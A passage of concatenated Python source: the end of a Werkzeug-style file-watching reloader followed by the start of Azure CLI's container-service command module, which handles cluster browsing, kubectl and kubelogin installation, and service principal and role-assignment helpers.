filename = filename[:-1]
yield filename
def _find_observable_paths(extra_files=None):
    """Finds all paths that should be observed."""
    # every sys.path entry, plus the directory of each extra file and of
    # each loaded module's source file
    paths = {os.path.abspath(entry) for entry in sys.path}
    for extra in extra_files or ():
        paths.add(os.path.dirname(os.path.abspath(extra)))
    for module in list(sys.modules.values()):
        filename = getattr(module, '__file__', None)
        if filename is not None:
            paths.add(os.path.dirname(os.path.abspath(filename)))
    # collapse to the minimal set of common root directories
    return _find_common_roots(paths)
def _get_args_for_reloading():
"""Returns the executable. This contains a workaround for windows
if the executable is incorrectly reported to not have the .exe
extension which can cause bugs on reloading.
"""
rv = [sys.executable]
py_script = sys.argv[0]
if os.name == 'nt' and not os.path.exists(py_script) and \
os.path.exists(py_script + '.exe'):
py_script += '.exe'
rv.append(py_script)
rv.extend(sys.argv[1:])
return rv
def _find_common_roots(paths):
"""Out of some paths it finds the common roots that need monitoring."""
paths = [x.split(os.path.sep) for x in paths]
root = {}
for chunks in sorted(paths, key=len, reverse=True):
node = root
for chunk in chunks:
node = node.setdefault(chunk, {})
node.clear()
rv = set()
def _walk(node, path):
for prefix, child in iteritems(node):
_walk(child, path + (prefix,))
if not node:
rv.add('/'.join(path))
_walk(root, ())
return rv
class ReloaderLoop(object):
    """Base class for reloaders: watch files, restart the process on change."""
    name = None

    # monkeypatched by testsuite. wrapping with `staticmethod` is required in
    # case time.sleep has been replaced by a non-c function (e.g. by
    # `eventlet.monkey_patch`) before we get here
    _sleep = staticmethod(time.sleep)

    def __init__(self, extra_files=None, interval=1):
        # extra_files: paths to watch in addition to loaded modules;
        # interval: polling period in seconds
        self.extra_files = set(os.path.abspath(x)
                               for x in extra_files or ())
        self.interval = interval

    def run(self):
        """Watch for changes; subclasses implement the actual loop."""
        pass

    def restart_with_reloader(self):
        """Spawn a new Python interpreter with the same arguments as this one,
        but running the reloader thread.
        """
        while 1:
            _log('info', ' * Restarting with %s' % self.name)
            args = _get_args_for_reloading()
            new_environ = os.environ.copy()
            # flag tells the child process to run the app + watcher
            new_environ['WERKZEUG_RUN_MAIN'] = 'true'

            # a weird bug on windows. sometimes unicode strings end up in the
            # environment and subprocess.call does not like this, encode them
            # to latin1 and continue.
            if os.name == 'nt' and PY2:
                for key, value in iteritems(new_environ):
                    if isinstance(value, text_type):
                        new_environ[key] = value.encode('iso-8859-1')

            exit_code = subprocess.call(args, env=new_environ,
                                        close_fds=False)
            # exit code 3 means "change detected, restart me"; anything
            # else is a genuine exit and is propagated to the caller
            if exit_code != 3:
                return exit_code

    def trigger_reload(self, filename):
        # exit code 3 is the restart signal understood by the parent loop
        self.log_reload(filename)
        sys.exit(3)

    def log_reload(self, filename):
        filename = os.path.abspath(filename)
        _log('info', ' * Detected change in %r, reloading' % filename)
class StatReloaderLoop(ReloaderLoop):
    """Polling reloader: compares file mtimes every ``interval`` seconds."""
    name = 'stat'

    def run(self):
        mtimes = {}
        while 1:
            for filename in chain(_iter_module_files(),
                                  self.extra_files):
                try:
                    mtime = os.stat(filename).st_mtime
                except OSError:
                    # file vanished or is unreadable; skip it this round
                    continue

                old_time = mtimes.get(filename)
                if old_time is None:
                    # first sighting: record a baseline, don't reload
                    mtimes[filename] = mtime
                    continue
                elif mtime > old_time:
                    self.trigger_reload(filename)
            self._sleep(self.interval)
class WatchdogReloaderLoop(ReloaderLoop):
    """Event-driven reloader backed by the third-party `watchdog` package."""

    def __init__(self, *args, **kwargs):
        ReloaderLoop.__init__(self, *args, **kwargs)
        from watchdog.observers import Observer
        from watchdog.events import FileSystemEventHandler
        self.observable_paths = set()

        def _check_modification(filename):
            # reload for explicitly watched files, or for .py/.pyc/.pyo
            # files under any currently observed directory
            if filename in self.extra_files:
                self.trigger_reload(filename)
            dirname = os.path.dirname(filename)
            if dirname.startswith(tuple(self.observable_paths)):
                if filename.endswith(('.pyc', '.pyo')):
                    self.trigger_reload(filename[:-1])
                elif filename.endswith('.py'):
                    self.trigger_reload(filename)

        class _CustomHandler(FileSystemEventHandler):

            def on_created(self, event):
                _check_modification(event.src_path)

            def on_modified(self, event):
                _check_modification(event.src_path)

            def on_moved(self, event):
                _check_modification(event.src_path)
                _check_modification(event.dest_path)

            def on_deleted(self, event):
                _check_modification(event.src_path)

        # derive a display name like 'inotify reloader' from the observer class
        reloader_name = Observer.__name__.lower()
        if reloader_name.endswith('observer'):
            reloader_name = reloader_name[:-8]
        reloader_name += ' reloader'

        self.name = reloader_name

        self.observer_class = Observer
        self.event_handler = _CustomHandler()
        self.should_reload = False

    def trigger_reload(self, filename):
        # This is called inside an event handler, which means throwing
        # SystemExit has no effect.
        # https://github.com/gorakhargosh/watchdog/issues/294
        self.should_reload = True
        self.log_reload(filename)

    def run(self):
        watches = {}
        observer = self.observer_class()
        observer.start()

        # keep the set of watched directories in sync with the set of
        # loaded modules until a reload is requested
        while not self.should_reload:
            to_delete = set(watches)
            paths = _find_observable_paths(self.extra_files)
            for path in paths:
                if path not in watches:
                    try:
                        watches[path] = observer.schedule(
                            self.event_handler, path, recursive=True)
                    except OSError:
                        # Clear this path from list of watches We don't want
                        # the same error message showing again in the next
                        # iteration.
                        watches[path] = None
                to_delete.discard(path)
            for path in to_delete:
                watch = watches.pop(path, None)
                if watch is not None:
                    observer.unschedule(watch)
            self.observable_paths = paths
            self._sleep(self.interval)

        # exit code 3 signals the parent loop to restart us
        sys.exit(3)
# Registry of available reloader backends; 'auto' prefers the event-driven
# watchdog backend when the third-party package is importable, and falls
# back to mtime polling otherwise.
reloader_loops = {
    'stat': StatReloaderLoop,
    'watchdog': WatchdogReloaderLoop,
}

try:
    __import__('watchdog.observers')
except ImportError:
    reloader_loops['auto'] = reloader_loops['stat']
else:
    reloader_loops['auto'] = reloader_loops['watchdog']
def run_with_reloader(main_func, extra_files=None, interval=1,
                      reloader_type='auto'):
    """Run the given function in an independent python interpreter.

    :param main_func: callable run in the child process (the app).
    :param extra_files: additional files to watch for changes.
    :param interval: polling interval in seconds.
    :param reloader_type: key into ``reloader_loops`` ('auto', 'stat',
        'watchdog').
    """
    import signal
    reloader = reloader_loops[reloader_type](extra_files, interval)
    # make SIGTERM exit cleanly so finally blocks and atexit hooks run
    signal.signal(signal.SIGTERM, lambda *args: sys.exit(0))
    try:
        if os.environ.get('WERKZEUG_RUN_MAIN') == 'true':
            # Child process: run the app in a daemon thread while this
            # thread watches for file changes.
            t = threading.Thread(target=main_func, args=())
            # `Thread.setDaemon` is a deprecated alias; assigning the
            # `daemon` attribute works on both Python 2 and 3.
            t.daemon = True
            t.start()
            reloader.run()
        else:
            # Parent process: spawn the child, restarting it whenever it
            # exits with the reload code (3).
            sys.exit(reloader.restart_with_reloader())
    except KeyboardInterrupt:
        pass
|
custom.py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import colorama
import base64
import binascii
import datetime
import errno
import io
import json
import os
import os.path
import platform
import random
import re
import shutil
import ssl
import stat
import string
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import webbrowser
import zipfile
from distutils.version import StrictVersion
from math import isnan
from six.moves.urllib.request import urlopen # pylint: disable=import-error
from six.moves.urllib.error import URLError # pylint: disable=import-error
# pylint: disable=import-error
import yaml
import dateutil.parser
from dateutil.relativedelta import relativedelta
from knack.log import get_logger
from knack.util import CLIError
from knack.prompting import prompt_pass, NoTTYException, prompt_y_n
from msrestazure.azure_exceptions import CloudError
import requests
# pylint: disable=no-name-in-module,import-error
from azure.cli.command_modules.acs import acs_client, proxy
from azure.cli.command_modules.acs._params import regions_in_preview, regions_in_prod
from azure.cli.core.api import get_config_dir
from azure.cli.core.azclierror import (ResourceNotFoundError,
ClientRequestError,
ArgumentUsageError,
InvalidArgumentValueError,
MutuallyExclusiveArgumentError,
ValidationError,
UnauthorizedError)
from azure.cli.core._profile import Profile
from azure.cli.core.profiles import ResourceType
from azure.cli.core.commands.client_factory import get_mgmt_service_client, get_subscription_id
from azure.cli.core.keys import is_valid_ssh_rsa_public_key
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, truncate_text, sdk_no_wait
from azure.cli.core.commands import LongRunningOperation
from azure.graphrbac.models import (ApplicationCreateParameters,
ApplicationUpdateParameters,
PasswordCredential,
KeyCredential,
ServicePrincipalCreateParameters,
GetObjectsParameters,
ResourceAccess, RequiredResourceAccess)
from azure.mgmt.containerservice.models import ContainerServiceOrchestratorTypes
from ._client_factory import cf_container_services
from ._client_factory import cf_resource_groups
from ._client_factory import get_auth_management_client
from ._client_factory import get_graph_rbac_management_client
from ._client_factory import cf_resources
from ._client_factory import get_resource_by_name
from ._client_factory import cf_container_registry_service
from ._client_factory import cf_agent_pools
from ._client_factory import get_msi_client
from ._helpers import (_populate_api_server_access_profile, _set_vm_set_type, _set_outbound_type,
_parse_comma_separated_list)
from ._loadbalancer import (set_load_balancer_sku, is_load_balancer_profile_provided,
update_load_balancer_profile, create_load_balancer_profile)
from ._consts import CONST_SCALE_SET_PRIORITY_REGULAR, CONST_SCALE_SET_PRIORITY_SPOT, CONST_SPOT_EVICTION_POLICY_DELETE
from ._consts import CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME
from ._consts import CONST_MONITORING_ADDON_NAME
from ._consts import CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID
from ._consts import CONST_VIRTUAL_NODE_ADDON_NAME
from ._consts import CONST_VIRTUAL_NODE_SUBNET_NAME
from ._consts import CONST_KUBE_DASHBOARD_ADDON_NAME
from ._consts import CONST_AZURE_POLICY_ADDON_NAME
from ._consts import CONST_INGRESS_APPGW_ADDON_NAME
from ._consts import CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID, CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME
from ._consts import CONST_INGRESS_APPGW_SUBNET_CIDR, CONST_INGRESS_APPGW_SUBNET_ID
from ._consts import CONST_INGRESS_APPGW_WATCH_NAMESPACE
from ._consts import CONST_CONFCOM_ADDON_NAME, CONST_ACC_SGX_QUOTE_HELPER_ENABLED
from ._consts import ADDONS
from ._consts import CONST_CANIPULL_IMAGE
from ._consts import CONST_PRIVATE_DNS_ZONE_SYSTEM
from ._consts import CONST_MANAGED_IDENTITY_OPERATOR_ROLE, CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID
# Module-level logger for this command module (knack logging framework).
logger = get_logger(__name__)
# pylint:disable=too-many-lines,unused-argument
def which(binary):
    """Search the PATH for *binary* and return its full path, or None.

    On Windows the '.exe' suffix is appended and ';' is used as the
    PATH separator; elsewhere ':' is used.
    """
    search_path = os.getenv('PATH')
    on_windows = platform.system() == 'Windows'
    name = binary + '.exe' if on_windows else binary
    separator = ';' if on_windows else ':'
    for directory in search_path.split(separator):
        candidate = os.path.join(directory, name)
        if os.path.exists(candidate) and os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None
def wait_then_open(url):
    """
    Waits for a bit then opens a URL. Useful for waiting for a proxy to come up, and then open the URL.

    Probes *url* up to 9 times, sleeping one second after each connection
    failure, then opens it in a new browser tab.
    """
    for _ in range(1, 10):
        try:
            urlopen(url, context=_ssl_context())
        except URLError:
            # Endpoint not reachable yet -- wait a moment and probe again.
            # (The original placed an unconditional `break` after the
            # try/except, so the retry loop never actually retried.)
            time.sleep(1)
            continue
        break  # probe succeeded
    webbrowser.open_new_tab(url)
def wait_then_open_async(url):
    """
    Spawns a daemon thread that waits for a bit then opens a URL.
    """
    # The original passed args=({url}) -- a *set* literal, not a tuple --
    # which only worked by accident because Thread unpacks any iterable.
    # Use a proper 1-tuple as the threading API documents.
    t = threading.Thread(target=wait_then_open, args=(url,))
    t.daemon = True
    t.start()
def acs_browse(cmd, client, resource_group_name, name, disable_browser=False, ssh_key_file=None):
    """
    Opens a browser to the web interface for the cluster orchestrator.

    :param name: Name of the target Azure container service instance.
    :type name: String
    :param resource_group_name: Name of Azure container service's resource group.
    :type resource_group_name: String
    :param disable_browser: If true, don't launch a web browser after estabilishing the proxy
    :type disable_browser: bool
    :param ssh_key_file: If set a path to an SSH key to use, only applies to DCOS
    :type ssh_key_file: string
    """
    cluster_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
    _acs_browse_internal(cmd, client, cluster_info, resource_group_name,
                         name, disable_browser, ssh_key_file)
def _acs_browse_internal(cmd, client, acs_info, resource_group_name, name, disable_browser, ssh_key_file):
    """Dispatch browse to the orchestrator-specific implementation."""
    orchestrator_type = acs_info.orchestrator_profile.orchestrator_type  # pylint: disable=no-member
    looks_like_kubernetes = (
        str(orchestrator_type).lower() == 'kubernetes' or
        orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes or
        (acs_info.custom_profile and acs_info.custom_profile.orchestrator == 'kubernetes'))  # pylint: disable=no-member
    if looks_like_kubernetes:
        return k8s_browse(cmd, client, name, resource_group_name, disable_browser, ssh_key_file=ssh_key_file)
    looks_like_dcos = (str(orchestrator_type).lower() == 'dcos' or
                       orchestrator_type == ContainerServiceOrchestratorTypes.dcos)
    if looks_like_dcos:
        return _dcos_browse_internal(acs_info, disable_browser, ssh_key_file)
    raise CLIError(
        'Unsupported orchestrator type {} for browse'.format(orchestrator_type))
def k8s_browse(cmd, client, name, resource_group_name, disable_browser=False, ssh_key_file=None):
    """
    Launch a proxy and browse the Kubernetes web UI.

    :param disable_browser: If true, don't launch a web browser after estabilishing the proxy
    :type disable_browser: bool
    """
    cluster_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
    _k8s_browse_internal(name, cluster_info, disable_browser, ssh_key_file)
def _k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file):
    """Write browse credentials, launch `kubectl proxy`, and open the UI."""
    if not which('kubectl'):
        raise CLIError('Can not find kubectl executable in PATH')
    kubeconfig = os.path.join(get_config_dir(), 'acsBrowseConfig.yaml')
    # Always regenerate the browse kubeconfig from scratch.
    if os.path.exists(kubeconfig):
        os.remove(kubeconfig)
    _k8s_get_credentials_internal(name, acs_info, kubeconfig, ssh_key_file, False)
    logger.warning('Proxy running on 127.0.0.1:8001/ui')
    logger.warning('Press CTRL+C to close the tunnel...')
    if not disable_browser:
        wait_then_open_async('http://127.0.0.1:8001/ui')
    # Blocks until the user interrupts the proxy.
    subprocess.call(["kubectl", "--kubeconfig", kubeconfig, "proxy"])
def dcos_browse(cmd, client, name, resource_group_name, disable_browser=False, ssh_key_file=None):
    """
    Creates an SSH tunnel to the Azure container service, and opens the Mesosphere DC/OS dashboard in the browser.

    :param name: name: Name of the target Azure container service instance.
    :type name: String
    :param resource_group_name: Name of Azure container service's resource group.
    :type resource_group_name: String
    :param disable_browser: If true, don't launch a web browser after estabilishing the proxy
    :type disable_browser: bool
    :param ssh_key_file: Path to the SSH key to use
    :type ssh_key_file: string
    """
    cluster_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
    _dcos_browse_internal(cluster_info, disable_browser, ssh_key_file)
def _dcos_browse_internal(acs_info, disable_browser, ssh_key_file):
    """SSH to the cluster, start the octarine proxy remotely, tunnel a local
    port to it, and (optionally) open the DC/OS dashboard in a browser.

    :param acs_info: container service resource (provides host name/username)
    :param disable_browser: if truthy, skip opening the local browser tab
    :param ssh_key_file: path to the private key used for the SSH connection
    """
    if not os.path.isfile(ssh_key_file):
        raise CLIError(
            'Private key file {} does not exist'.format(ssh_key_file))
    acs = acs_client.ACSClient()
    if not acs.connect(_get_host_name(acs_info), _get_username(acs_info),
                       key_filename=ssh_key_file):
        raise CLIError('Error connecting to ACS: {}'.format(
            _get_host_name(acs_info)))
    octarine_bin = '/opt/mesosphere/bin/octarine'
    if not acs.file_exists(octarine_bin):
        raise CLIError(
            'Proxy server ({}) does not exist on the cluster.'.format(octarine_bin))
    # Start the octarine proxy on the cluster under a random instance id.
    proxy_id = _rand_str(16)
    proxy_cmd = '{} {}'.format(octarine_bin, proxy_id)
    acs.run(proxy_cmd, background=True)
    # Parse the output to get the remote PORT
    proxy_client_cmd = '{} --client --port {}'.format(octarine_bin, proxy_id)
    stdout, _ = acs.run(proxy_client_cmd)
    remote_port = int(stdout.read().decode().strip())
    local_port = acs.get_available_local_port()
    # Set the proxy
    proxy.set_http_proxy('127.0.0.1', local_port)
    logger.warning('Proxy running on 127.0.0.1:%s', local_port)
    logger.warning('Press CTRL+C to close the tunnel...')
    if not disable_browser:
        wait_then_open_async('http://127.0.0.1')
    try:
        # Blocks until interrupted; forwards local_port to the remote proxy.
        acs.create_tunnel(
            remote_host='127.0.0.1',
            remote_port=remote_port,
            local_port=local_port)
    finally:
        # Always restore the system proxy settings, even on CTRL+C.
        proxy.disable_http_proxy()
def acs_install_cli(cmd, client, resource_group_name, name, install_location=None, client_version=None):
    """Install the CLI matching the cluster's orchestrator (kubectl or dcos).

    :param install_location: full path (including file name) for the binary.
    :param client_version: optional version override for the downloaded CLI.
    :raises CLIError: for orchestrators other than kubernetes/dcos.
    """
    acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
    orchestrator_type = acs_info.orchestrator_profile.orchestrator_type  # pylint: disable=no-member
    # Both installers take `cmd` as their first required parameter; the
    # original omitted it from kwargs, so the calls below raised TypeError.
    kwargs = {'cmd': cmd, 'install_location': install_location}
    if client_version:
        kwargs['client_version'] = client_version
    if orchestrator_type == 'kubernetes':
        return k8s_install_cli(**kwargs)
    if orchestrator_type == 'dcos':
        return dcos_install_cli(**kwargs)
    raise CLIError(
        'Unsupported orchestrator type {} for install-cli'.format(orchestrator_type))
def _ssl_context():
    """Return an SSL context; fall back to an explicit TLS context on old
    interpreters or in the Windows Cloud Shell."""
    needs_fallback = sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows')
    if not needs_fallback:
        return ssl.create_default_context()
    try:
        # ssl.PROTOCOL_TLS was added in python 2.7.13 and 3.6
        return ssl.SSLContext(ssl.PROTOCOL_TLS)
    except AttributeError:
        return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
def _urlretrieve(url, filename):
    """Download *url* into *filename*.

    Streams the body in chunks via shutil.copyfileobj instead of buffering
    the whole payload in memory, and always closes the HTTP response (the
    original leaked the connection).
    """
    req = urlopen(url, context=_ssl_context())
    try:
        with open(filename, "wb") as f:
            shutil.copyfileobj(req, f)
    finally:
        req.close()
def _unzip(src, dest):
    """Extract the zip archive *src* into the directory *dest*."""
    logger.debug('Extracting %s to %s.', src, dest)
    if platform.system() not in ('Linux', 'Darwin', 'Windows'):
        raise CLIError('The current system is not supported.')
    with zipfile.ZipFile(src, 'r') as archive:
        archive.extractall(dest)
def dcos_install_cli(cmd, install_location=None, client_version='1.8'):
    """
    Downloads the dcos command line from Mesosphere

    :param install_location: full path (including file name) for the binary.
    :param client_version: DC/OS CLI version line to download (e.g. '1.8').
    :raises CLIError: when no install location is given, the platform is
        unsupported, or the download fails.
    """
    system = platform.system()
    if not install_location:
        raise CLIError(
            "No install location specified and it could not be determined from the current platform '{}'".format(
                system))
    base_url = 'https://downloads.dcos.io/binaries/cli/{}/x86-64/dcos-{}/{}'
    if system == 'Windows':
        file_url = base_url.format('windows', client_version, 'dcos.exe')
    elif system == 'Linux':
        # TODO Support ARM CPU here
        file_url = base_url.format('linux', client_version, 'dcos')
    elif system == 'Darwin':
        file_url = base_url.format('darwin', client_version, 'dcos')
    else:
        # The previous message ('Proxy server ... does not exist on the
        # cluster.') was copy-pasted from the DC/OS tunnel code and was
        # misleading for an unsupported-platform failure.
        raise CLIError('The {} platform is not currently supported.'.format(system))
    logger.warning('Downloading client to %s', install_location)
    try:
        _urlretrieve(file_url, install_location)
        # Make the downloaded binary executable for user/group/other.
        os.chmod(install_location,
                 os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
    except IOError as err:
        raise CLIError(
            'Connection error while attempting to download client ({})'.format(err))
def k8s_install_cli(cmd, client_version='latest', install_location=None, base_src_url=None,
                    kubelogin_version='latest', kubelogin_install_location=None,
                    kubelogin_base_src_url=None):
    """Install both kubectl and kubelogin in a single command."""
    k8s_install_kubectl(cmd, client_version, install_location, base_src_url)
    k8s_install_kubelogin(
        cmd, kubelogin_version, kubelogin_install_location, kubelogin_base_src_url)
def k8s_install_kubectl(cmd, client_version='latest', install_location=None, source_url=None):
    """
    Install kubectl, a command-line interface for Kubernetes clusters.

    :param client_version: release to install, or 'latest' to resolve the
        current stable version from the release feed.
    :param install_location: full path (including file name) for the binary.
    :param source_url: override for the release download mirror.
    :raises CLIError: when the platform is unsupported or the download fails.
    """
    if not source_url:
        source_url = "https://storage.googleapis.com/kubernetes-release/release"
        cloud_name = cmd.cli_ctx.cloud.name
        if cloud_name.lower() == 'azurechinacloud':
            source_url = 'https://mirror.azure.cn/kubernetes/kubectl'
    if client_version == 'latest':
        context = _ssl_context()
        version = urlopen(source_url + '/stable.txt', context=context).read()
        client_version = version.decode('UTF-8').strip()
    else:
        client_version = "v%s" % client_version
    file_url = ''
    system = platform.system()
    base_url = source_url + '/{}/bin/{}/amd64/{}'
    # ensure installation directory exists
    install_dir, cli = os.path.dirname(
        install_location), os.path.basename(install_location)
    if not os.path.exists(install_dir):
        os.makedirs(install_dir)
    if system == 'Windows':
        file_url = base_url.format(client_version, 'windows', 'kubectl.exe')
    elif system == 'Linux':
        # TODO: Support ARM CPU here
        file_url = base_url.format(client_version, 'linux', 'kubectl')
    elif system == 'Darwin':
        file_url = base_url.format(client_version, 'darwin', 'kubectl')
    else:
        # The previous message ('Proxy server ... does not exist on the
        # cluster.') was copy-pasted from the DC/OS tunnel code and did not
        # describe this failure.
        raise CLIError('The {} platform is not currently supported.'.format(system))
    logger.warning('Downloading client to "%s" from "%s"',
                   install_location, file_url)
    try:
        _urlretrieve(file_url, install_location)
        # Make the downloaded binary executable for user/group/other.
        os.chmod(install_location,
                 os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
    except IOError as ex:
        raise CLIError(
            'Connection error while attempting to download client ({})'.format(ex))
    if system == 'Windows':  # be verbose, as the install_location likely not in Windows's search PATHs
        env_paths = os.environ['PATH'].split(';')
        found = next((x for x in env_paths if x.lower().rstrip(
            '\\') == install_dir.lower()), None)
        if not found:
            # pylint: disable=logging-format-interpolation
            logger.warning('Please add "{0}" to your search PATH so the `{1}` can be found. 2 options: \n'
                           ' 1. Run "set PATH=%PATH%;{0}" or "$env:path += \'{0}\'" for PowerShell. '
                           'This is good for the current command session.\n'
                           ' 2. Update system PATH environment variable by following '
                           '"Control Panel->System->Advanced->Environment Variables", and re-open the command window. '
                           'You only need to do it once'.format(install_dir, cli))
    else:
        logger.warning('Please ensure that %s is in your search PATH, so the `%s` command can be found.',
                       install_dir, cli)
def k8s_install_kubelogin(cmd, client_version='latest', install_location=None, source_url=None):
    """
    Install kubelogin, a client-go credential (exec) plugin implementing azure authentication.

    :param client_version: release to install, or 'latest' to resolve the
        newest tag from the GitHub (or mirror) release feed.
    :param install_location: full path (including file name) for the binary.
    :param source_url: override for the release download mirror.
    :raises CLIError: when the platform is unsupported or the download fails.
    """
    cloud_name = cmd.cli_ctx.cloud.name
    if not source_url:
        source_url = 'https://github.com/Azure/kubelogin/releases/download'
        if cloud_name.lower() == 'azurechinacloud':
            source_url = 'https://mirror.azure.cn/kubernetes/kubelogin'
    if client_version == 'latest':
        context = _ssl_context()
        latest_release_url = 'https://api.github.com/repos/Azure/kubelogin/releases/latest'
        if cloud_name.lower() == 'azurechinacloud':
            latest_release_url = 'https://mirror.azure.cn/kubernetes/kubelogin/latest'
        latest_release = urlopen(latest_release_url, context=context).read()
        client_version = json.loads(latest_release)['tag_name'].strip()
    else:
        client_version = "v%s" % client_version
    base_url = source_url + '/{}/kubelogin.zip'
    file_url = base_url.format(client_version)
    # ensure installation directory exists
    install_dir, cli = os.path.dirname(
        install_location), os.path.basename(install_location)
    if not os.path.exists(install_dir):
        os.makedirs(install_dir)
    system = platform.system()
    if system == 'Windows':
        sub_dir, binary_name = 'windows_amd64', 'kubelogin.exe'
    elif system == 'Linux':
        # TODO: Support ARM CPU here
        sub_dir, binary_name = 'linux_amd64', 'kubelogin'
    elif system == 'Darwin':
        sub_dir, binary_name = 'darwin_amd64', 'kubelogin'
    else:
        # The previous message ('Proxy server ... does not exist on the
        # cluster.') was copy-pasted from the DC/OS tunnel code and did not
        # describe this failure.
        raise CLIError('The {} platform is not currently supported.'.format(system))
    with tempfile.TemporaryDirectory() as tmp_dir:
        try:
            download_path = os.path.join(tmp_dir, 'kubelogin.zip')
            logger.warning('Downloading client to "%s" from "%s"',
                           download_path, file_url)
            _urlretrieve(file_url, download_path)
        except IOError as ex:
            raise CLIError(
                'Connection error while attempting to download client ({})'.format(ex))
        _unzip(download_path, tmp_dir)
        download_path = os.path.join(tmp_dir, 'bin', sub_dir, binary_name)
        shutil.move(download_path, install_location)
    # Make the installed binary executable for user/group/other.
    os.chmod(install_location, os.stat(install_location).st_mode |
             stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
    if system == 'Windows':  # be verbose, as the install_location likely not in Windows's search PATHs
        env_paths = os.environ['PATH'].split(';')
        found = next((x for x in env_paths if x.lower().rstrip(
            '\\') == install_dir.lower()), None)
        if not found:
            # pylint: disable=logging-format-interpolation
            logger.warning('Please add "{0}" to your search PATH so the `{1}` can be found. 2 options: \n'
                           ' 1. Run "set PATH=%PATH%;{0}" or "$env:path += \'{0}\'" for PowerShell. '
                           'This is good for the current command session.\n'
                           ' 2. Update system PATH environment variable by following '
                           '"Control Panel->System->Advanced->Environment Variables", and re-open the command window. '
                           'You only need to do it once'.format(install_dir, cli))
    else:
        logger.warning('Please ensure that %s is in your search PATH, so the `%s` command can be found.',
                       install_dir, cli)
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
    """Create an AAD application and a service principal for it.

    Returns a ``(service_principal, aad_session_key)`` tuple; the first
    element is ``False`` when principal creation still fails after 10 tries.
    """
    # use get_progress_controller
    hook = cli_ctx.get_progress_controller(True)
    # BUGFIX: the keyword was misspelled 'messsage' in the original call,
    # unlike every other hook.add() in this module.
    hook.add(message='Creating service principal', value=0, total_val=1.0)
    logger.info('Creating service principal')
    # always create application with 5 years expiration
    start_date = datetime.datetime.utcnow()
    end_date = start_date + relativedelta(years=5)
    result, aad_session_key = create_application(rbac_client.applications, name, url, [url], password=client_secret,
                                                 start_date=start_date, end_date=end_date)
    service_principal = result.app_id  # pylint: disable=no-member
    # AAD replication can lag behind application creation; retry with a
    # linearly growing backoff.
    for x in range(0, 10):
        hook.add(message='Creating service principal',
                 value=0.1 * x, total_val=1.0)
        try:
            create_service_principal(
                cli_ctx, service_principal, rbac_client=rbac_client)
            break
        # TODO figure out what exception AAD throws here sometimes.
        except Exception as ex:  # pylint: disable=broad-except
            logger.info(ex)
            time.sleep(2 + 2 * x)
    else:
        # All retries exhausted.
        return False, aad_session_key
    hook.add(message='Finished service principal creation',
             value=1.0, total_val=1.0)
    logger.info('Finished service principal creation')
    return service_principal, aad_session_key
def _add_role_assignment(cli_ctx, role, service_principal_msi_id, is_service_principal=True, delay=2, scope=None):
    """Assign *role* to a principal/identity, retrying while AAD propagates.

    Returns True on success (or when the assignment already exists) and
    False when all 10 attempts fail.
    """
    # AAD can have delays in propagating data, so sleep and retry
    hook = cli_ctx.get_progress_controller(True)
    hook.add(message='Waiting for AAD role to propagate',
             value=0, total_val=1.0)
    logger.info('Waiting for AAD role to propagate')
    for x in range(0, 10):
        hook.add(message='Waiting for AAD role to propagate',
                 value=0.1 * x, total_val=1.0)
        try:
            # TODO: break this out into a shared utility library
            create_role_assignment(
                cli_ctx, role, service_principal_msi_id, is_service_principal, scope=scope)
            break
        except CloudError as ex:
            if ex.message == 'The role assignment already exists.':
                break
            logger.info(ex.message)
        except Exception:  # pylint: disable=broad-except
            # Best-effort retry: swallow transient errors, but no longer
            # catch SystemExit/KeyboardInterrupt as the old bare `except:`
            # did.
            pass
        time.sleep(delay + delay * x)
    else:
        return False
    hook.add(message='AAD role propagation done', value=1.0, total_val=1.0)
    logger.info('AAD role propagation done')
    return True
def delete_role_assignments(cli_ctx, ids=None, assignee=None, role=None, resource_group_name=None,
                            scope=None, include_inherited=False, yes=None):
    """Delete role assignments by explicit ids or by assignee/role/scope.

    With no narrowing arguments and no ``yes``, prompts for confirmation
    before deleting every assignment under the subscription.
    """
    factory = get_auth_management_client(cli_ctx, scope)
    assignments_client = factory.role_assignments
    definitions_client = factory.role_definitions
    ids = ids or []
    if ids:
        if assignee or role or resource_group_name or scope or include_inherited:
            raise CLIError(
                'When assignment ids are used, other parameter values are not required')
        for i in ids:
            assignments_client.delete_by_id(i)
        return
    # BUGFIX: 'assignee' appeared twice in this list in the original;
    # the redundant duplicate is removed (no behavior change).
    if not any([ids, assignee, role, resource_group_name, scope, yes]):
        msg = 'This will delete all role assignments under the subscription. Are you sure?'
        if not prompt_y_n(msg, default="n"):
            return
    scope = _build_role_scope(resource_group_name, scope,
                              assignments_client.config.subscription_id)
    assignments = _search_role_assignments(cli_ctx, assignments_client, definitions_client,
                                           scope, assignee, role, include_inherited,
                                           include_groups=False)
    if assignments:
        for a in assignments:
            assignments_client.delete_by_id(a.id)
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
    """Delete a role assignment, retrying while AAD data propagates.

    Returns True on success and False when all 10 attempts fail.
    """
    # AAD can have delays in propagating data, so sleep and retry
    hook = cli_ctx.get_progress_controller(True)
    hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
    logger.info('Waiting for AAD role to delete')
    for x in range(0, 10):
        hook.add(message='Waiting for AAD role to delete',
                 value=0.1 * x, total_val=1.0)
        try:
